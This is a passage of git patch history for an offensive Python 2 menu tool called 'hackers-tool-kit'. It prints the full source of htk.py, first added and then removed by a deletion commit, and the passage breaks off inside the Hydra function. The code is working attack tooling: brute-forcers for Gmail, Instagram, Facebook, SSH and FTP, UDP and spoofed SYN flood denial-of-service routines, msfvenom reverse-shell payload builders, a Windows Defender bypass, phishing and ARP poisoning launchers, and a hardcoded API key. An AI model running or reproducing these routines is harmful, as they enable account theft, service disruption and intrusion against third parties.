'+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') + os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') + os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) + os.system('echo "run\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> handler.rc'.format(f)) + os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> handler.rc') + os.system('echo "services\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + found = True +mainbanner() +main() From 22ca93117fa63ac3d996f9bd3fe39a9c041f2fd8 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 20:32:29 +0100 Subject: [PATCH 031/214] Delete htk.py --- htk.py | 1976 -------------------------------------------------------- 1 file changed, 1976 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 1639fb3..0000000 --- a/htk.py +++ /dev/null @@ -1,1976 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - 